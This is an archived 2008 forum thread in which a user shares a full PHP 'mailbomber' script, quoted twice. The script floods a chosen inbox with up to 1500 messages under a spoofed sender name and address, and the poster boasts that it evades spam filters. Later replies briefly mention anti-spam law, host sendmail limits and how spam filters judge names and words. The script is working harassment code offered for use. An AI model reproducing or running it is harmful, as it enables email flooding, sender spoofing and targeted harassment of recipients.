PDA

View Full Version : LOOL mail bombing



Decode
01-03-2008, 04:05 PM
found this script, you can bomb someones email, and the emails dont come up in spam box :)


<?php
// Script by Guido Chorus.
session_start();
$_SESSION['checked'] = 1; // no login needed!
$sUser = "demo";
$sPass = "1234";
function validateEmail($pEmail) {
ereg("([_a-z0-9-]+(\.[_a-z0-9-]+)*@[a-z0-9-]+(\.[a-z0-9-]+)*)", $pEmail, $regs);
if($regs[1] == $pEmail) {
return TRUE;
}
return FALSE;
}
$action = (isset(
$_POST['action']) && is_string(
$_POST['action']) && strlen(
$_POST['action'])
>= 1)
? $_POST['action'] : -1;
echo "<font size='6'><b>FREE anonymous mailbomber :)</b></font><br><font size='4' color='gray'>annoy your friends..</font><br><br>";
if($_SESSION['checked'] == 1) {
// This user is validated
if($action == -1) {
?>
<form input='' method='POST'>
<input type='hidden' name='action' value='sended'>
Email to (address):<br />
<input name='to' type='text'><br />
Your Real Name ;) :<br />
<input name='realname' type='text'><br />
Email from(reply address?):<br />
<input name='from' type='text'><br />
Subject:<br />
<input name='subject' type='text'><br />
dont tick: <input name='****back' type='checkbox'><br />
Msg:<br />
<textarea name='msg' rows='10' cols='60'></textarea><br />
Number of bombs:<br />
<select size="1" name="num">
<option value="1">(1) Anonymous mail :)</option>
<option value="3">(3) mwah</option>
<option value="10">(10) could be more</option>
<option value="50">(50) hehe</option>
<option value="100">(100) nice</option>
<option value="150">(150) painfull</option>
<option value="300">(300) Whooppssssss!!!!</option>
<option value="1500">(1500) Domina! o//</option>
</select><br /><br />
<input type='submit' value='BOMB UM!!'>
</form>
<?php
}
else {
$to = $_POST['to'];
$realname = $_POST['realname'];
$from = $_POST['from'];
$subject = $_POST['subject'];
$msg = $_POST['msg'];
$num = $_POST['num'];
$****back = $_POST['****back'];
if($to != "" && $realname != "" && $from != "" && $subject != "" && $msg != "" && $num != "" && validateEmail($from) && validateEmail($to)) {
$message = "";
$headers = "From: $realname<$from>\n";
$headers .= "Reply-To: <$from>\n";
$headers .= "MIME-Version: 1.0\n";
$headers .= "Content-Type: multipart/related;type=\"multipart/alternative\"; boundary=\"----=MIME_BOUNDRY_main_message\"\n";
$headers .= "X-Sender: $from<$from>\n";
$headers .= "X-Mailer: PHP5\n"; //mailer
$headers .= "X-Priority: 1\n"; //1 UrgentMessage, 3 Normal
$headers .= "Return-Path: <$from>\n";
$headers .= "This is a multi-part message in MIME format.\n";
$headers .= "------=MIME_BOUNDRY_main_message \n";
$headers .= "Content-Type: multipart/alternative; boundary=\"----=MIME_BOUNDRY_message_parts\"\n";
$message == "";
$message .= "------=MIME_BOUNDRY_message_parts\n";
$message .= "Content-Type: text/html;\n charset=\"iso-8859-1\"\n";
$message .= "Content-Transfer-Encoding: quoted-printable\n";
$message .= "\n";
$message .= "<!DOCTYPE HTML PUBLIC \"-//W3C//DTD HTML 4.0 Transitional//EN\">\n";
$message .= "<HTML><BODY><FONT FACE=VERDANA>\n";
$message .= $msg;
if($****back == "on") {
$message .= "<br><br><br>**** back at: <a href='http://demo.scripts.boukoul.nl/php/mailbomber/mailbomber.php'>http://demo.scripts.boukoul.nl/php/mailbomber/mailbomber.php</a> :)";
}
for ($i = 0; $i < $num; $i++) {
mail($to,$subject,$message,$headers);
echo $i + 1 . " times bombed, muhahaha :D :D :D !!11!!!one!!!!eleven!!!111!!!<br>\n";
}
echo "<br><br><a href='". $_SERVER['PHP_SELF'] ."'><b>Send another one! Click here...</b></a>";
echo "<meta http-equiv=\"Refresh\" content=\"90; URL=''\" />";
}
else {
echo "Every field is required or an invalid email address (from and to).";
echo "<meta http-equiv=\"Refresh\" content=\"4; URL=''\" />";
}
}
}
else {
// Needs to login or check.
if($action == "checkLogin") {
$user = (isset(
$_POST['user']) && is_string(
$_POST['user']) && strlen(
$_POST['user'])
>= 1)
? $_POST['user'] : -1;
$pass = (isset(
$_POST['pass']) && is_string(
$_POST['pass']) && strlen(
$_POST['pass'])
>= 1)
? $_POST['pass'] : -1;
if($user != -1 && $pass != -1) {
if($sUser == $user && $sPass == $pass) {
$_SESSION['checked'] = 1;
}
}
echo "<meta http-equiv=\"Refresh\" content=\"0; URL=''\" />";
}
else {
?>
<form action="" method='POST'>
<input type='hidden' name='action' value='checkLogin'>
Username:<br />
<input type="text" name="user" value="demo"><br />
Password:<br />
<input type="password" name="pass" value="1234"><br />
<input type='submit' value='login'>
</form>
<?php
}
}
?>

LegendOfNoob
01-03-2008, 04:29 PM
LOL the only problem with that is you can get sued in the states for bulk i beleive its in uk too but in the states i can cost the spammer $10 a mail or a grand a day so its something to think about fore you go going around spamming still cool could be used to do a newslater with some editing

Also the not in spam box is cause of the name hasnt been blocked HOWEVER
most spam boxes filter due to name

Moh
01-03-2008, 04:42 PM
LOL the only problem with that is you can get sued in the states for bulk i beleive its in uk too but in the states i can cost the spammer $10 a mail or a grand a day so its something to think about fore you go going around spamming still cool could be used to do a newslater with some editing

Also the not in spam box is cause of the name hasnt been blocked HOWEVER
most spam boxes filter due to name
When we send our auto email (From DJ Panel) it has a name (Well its "Radio Panel Details") and it still sends to Junk?

LegendOfNoob
01-03-2008, 04:45 PM
you see your mail may say it as junk due to the Panel word commonly a sales email
also what does it send the email from certain words in email also are considered bulk aswell as it could be your sitename

Moh
01-03-2008, 04:49 PM
you see your mail may say it as junk due to the Panel word commonly a sales email
also what does it send the email from certain words in email also are considered bulk aswell as it could be your sitename
Thats a bit of a pain :(
Another thing is, it says From: *cPanel User*@*servername*.*serverip*.com on Behalf of *email*.
Which is realy annoying.

LegendOfNoob
01-03-2008, 05:18 PM
indeed that is on a spam list you need a different way of doing that hmm heres a tip try not using cpanel and get a regular script it will work much better and should be more interchangable

QuickScriptz
01-03-2008, 08:22 PM
I guess no one realized that 90% of hosts have php sendmail limits? Also, I doubt that this would work flawlessly without any of the emails being marked as spam.

And just FYI, if you have GMail you can just search/delete by subject and sender.

Buax
01-03-2008, 08:34 PM
I guess no one realized that 90% of hosts have php sendmail limits? Also, I doubt that this would work flawlessly without any of the emails being marked as spam.

And just FYI, if you have GMail you can just search/delete by subject and sender.
I thought cpanel had this defaulty?

Hypertext
01-03-2008, 08:46 PM
This is all very well until 60 year old dorris comes along to check her emails from her favorite knitting website and finds a bunch of rude, rude, oh so rude words. She believes this is not aloud and calls the police, they find out its a crime you get done in. Nuff said.

craigg.
01-03-2008, 08:59 PM
It's not the best I've seen. It's not worth uploading to test as there are other better ways to spam mail boxes. Also, there is a law within the UK that allows people to run websites that allows you to sign up (basically for spam, woo fun!) as you can tell, no one uses it for themselves, they register other members.

Agnostic Bear
01-03-2008, 09:47 PM
found this script, you can bomb someones email, and the emails dont come up in spam box :)


<?php
// Script by Guido Chorus.
session_start();
$_SESSION['checked'] = 1; // no login needed!
$sUser = "demo";
$sPass = "1234";
function validateEmail($pEmail) {
ereg("([_a-z0-9-]+(\.[_a-z0-9-]+)*@[a-z0-9-]+(\.[a-z0-9-]+)*)", $pEmail, $regs);
if($regs[1] == $pEmail) {
return TRUE;
}
return FALSE;
}
$action = (isset(
$_POST['action']) && is_string(
$_POST['action']) && strlen(
$_POST['action'])
>= 1)
? $_POST['action'] : -1;
echo "<font size='6'><b>FREE anonymous mailbomber :)</b></font><br><font size='4' color='gray'>annoy your friends..</font><br><br>";
if($_SESSION['checked'] == 1) {
// This user is validated
if($action == -1) {
?>
<form input='' method='POST'>
<input type='hidden' name='action' value='sended'>
Email to (address):<br />
<input name='to' type='text'><br />
Your Real Name ;) :<br />
<input name='realname' type='text'><br />
Email from(reply address?):<br />
<input name='from' type='text'><br />
Subject:<br />
<input name='subject' type='text'><br />
dont tick: <input name='****back' type='checkbox'><br />
Msg:<br />
<textarea name='msg' rows='10' cols='60'></textarea><br />
Number of bombs:<br />
<select size="1" name="num">
<option value="1">(1) Anonymous mail :)</option>
<option value="3">(3) mwah</option>
<option value="10">(10) could be more</option>
<option value="50">(50) hehe</option>
<option value="100">(100) nice</option>
<option value="150">(150) painfull</option>
<option value="300">(300) Whooppssssss!!!!</option>
<option value="1500">(1500) Domina! o//</option>
</select><br /><br />
<input type='submit' value='BOMB UM!!'>
</form>
<?php
}
else {
$to = $_POST['to'];
$realname = $_POST['realname'];
$from = $_POST['from'];
$subject = $_POST['subject'];
$msg = $_POST['msg'];
$num = $_POST['num'];
$****back = $_POST['****back'];
if($to != "" && $realname != "" && $from != "" && $subject != "" && $msg != "" && $num != "" && validateEmail($from) && validateEmail($to)) {
$message = "";
$headers = "From: $realname<$from>\n";
$headers .= "Reply-To: <$from>\n";
$headers .= "MIME-Version: 1.0\n";
$headers .= "Content-Type: multipart/related;type=\"multipart/alternative\"; boundary=\"----=MIME_BOUNDRY_main_message\"\n";
$headers .= "X-Sender: $from<$from>\n";
$headers .= "X-Mailer: PHP5\n"; //mailer
$headers .= "X-Priority: 1\n"; //1 UrgentMessage, 3 Normal
$headers .= "Return-Path: <$from>\n";
$headers .= "This is a multi-part message in MIME format.\n";
$headers .= "------=MIME_BOUNDRY_main_message \n";
$headers .= "Content-Type: multipart/alternative; boundary=\"----=MIME_BOUNDRY_message_parts\"\n";
$message == "";
$message .= "------=MIME_BOUNDRY_message_parts\n";
$message .= "Content-Type: text/html;\n charset=\"iso-8859-1\"\n";
$message .= "Content-Transfer-Encoding: quoted-printable\n";
$message .= "\n";
$message .= "<!DOCTYPE HTML PUBLIC \"-//W3C//DTD HTML 4.0 Transitional//EN\">\n";
$message .= "<HTML><BODY><FONT FACE=VERDANA>\n";
$message .= $msg;
if($****back == "on") {
$message .= "<br><br><br>**** back at: <a href='http://demo.scripts.boukoul.nl/php/mailbomber/mailbomber.php'>http://demo.scripts.boukoul.nl/php/mailbomber/mailbomber.php</a> :)";
}
for ($i = 0; $i < $num; $i++) {
mail($to,$subject,$message,$headers);
echo $i + 1 . " times bombed, muhahaha :D :D :D !!11!!!one!!!!eleven!!!111!!!<br>\n";
}
echo "<br><br><a href='". $_SERVER['PHP_SELF'] ."'><b>Send another one! Click here...</b></a>";
echo "<meta http-equiv=\"Refresh\" content=\"90; URL=''\" />";
}
else {
echo "Every field is required or an invalid email address (from and to).";
echo "<meta http-equiv=\"Refresh\" content=\"4; URL=''\" />";
}
}
}
else {
// Needs to login or check.
if($action == "checkLogin") {
$user = (isset(
$_POST['user']) && is_string(
$_POST['user']) && strlen(
$_POST['user'])
>= 1)
? $_POST['user'] : -1;
$pass = (isset(
$_POST['pass']) && is_string(
$_POST['pass']) && strlen(
$_POST['pass'])
>= 1)
? $_POST['pass'] : -1;
if($user != -1 && $pass != -1) {
if($sUser == $user && $sPass == $pass) {
$_SESSION['checked'] = 1;
}
}
echo "<meta http-equiv=\"Refresh\" content=\"0; URL=''\" />";
}
else {
?>
<form action="" method='POST'>
<input type='hidden' name='action' value='checkLogin'>
Username:<br />
<input type="text" name="user" value="demo"><br />
Password:<br />
<input type="password" name="pass" value="1234"><br />
<input type='submit' value='login'>
</form>
<?php
}
}
?>


Not very nice when you're on the receiving end.

Say... what's your email anyway?

Decode
01-03-2008, 09:55 PM
Not very nice when you're on the receiving end.

Say... what's your email anyway?
bomb me all u like. On hotmail you can report as phishing scam :P

Want to hide these adverts? Register an account for free!